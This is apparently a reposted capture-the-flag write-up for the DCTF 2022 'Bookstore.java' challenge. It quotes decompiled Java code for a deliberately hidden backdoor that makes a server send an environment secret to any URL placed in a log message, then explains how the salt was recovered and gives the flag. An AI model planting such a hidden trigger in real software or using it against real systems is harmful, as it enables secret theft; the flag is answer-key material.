An Interest In:
Web News this Week
- April 26, 2024
- April 25, 2024
- April 24, 2024
- April 23, 2024
- April 22, 2024
- April 21, 2024
- April 20, 2024
Some of Our Sources
- Slashdot
- Mashable
- The Logo Smith
- Spoon Graphics
- TutsPlus - Design
- Fuel Your Creativity
- Inspiredology
- My Ink Blog
- Freelance Switch
- The Verge
Help Webnuz
Referal links:
Bookstore.java - DCTF 22
I took part to the DCTF 2022 with the team Ulisse of the University of Bologna.
The Bookstore.java challenge stated that:
Web developer left the company becouse he was not being paid. He left some hidden features for him, to bypass security. Can you find the vunerability? http://book-store.dragonsec.si
And gave us a book_store.jar file.
The Log4Book
If we open the jarfile with a decompiler (like JD-GUI) we can see that there is a vulnerability in the log analyzer.
Pattern pattern2 = Pattern.compile("get\\{.*\\}salt=" + System.getenv("SALT"));Matcher matcher2 = pattern2.matcher(mssg);String substring2 = null;if (matcher2.find()) { substring2 = matcher2.group();}if (substring2 != null) { downloadFile(substring2.substring(substring2.indexOf(123) + 1, substring2.indexOf(125)));}If the log string contains the template get{...}salt= plus the env var SALT the program tries to send an HTTP request to the url between {...} with the header Not-Found: and the env var NOT_FOUND as the value.
URL link = new URL(url);link.toURI();HttpURLConnection conn = (HttpURLConnection) link.openConnection();conn.setRequestMethod("GET");conn.setRequestProperty("not-found", System.getenv("NOT_FOUND"));Finding the salt
We're given a hint:
Method how the salt is generated is given through variable names in one java class. The salt is 8 chars long.
If we look at the class Art we can see that there are two strange variable names:
> String frequency = fontType.getValue();int analysis_should_be_fun = findImageWidth(textHeight, artText, frequency);which create: frequency analysis should be fun
Analyzing the frequency
After trying to find some studies about the frequency analisis of Shakespeare plays without any result, we remember that the hint stated that the salt is 8 chars and there are exactly 8 paragraphs in the page presented in the website and in the file book.json
If we join the most repeated letter of each paragraph we get the salt and then we can get the program to ping our url with the flag.
Salt:
oeeeeoooFlag:
dctf{L0g_4_hid3n_d@7@\_n0t\_s0\_h@rd_righ7}
Original Link: https://dev.to/vaiton/bookstorejava-dctf-2022-5em9
Dev To
An online community for sharing and discovering great ideas, having debates, and making friendsMore About this Source Visit Dev To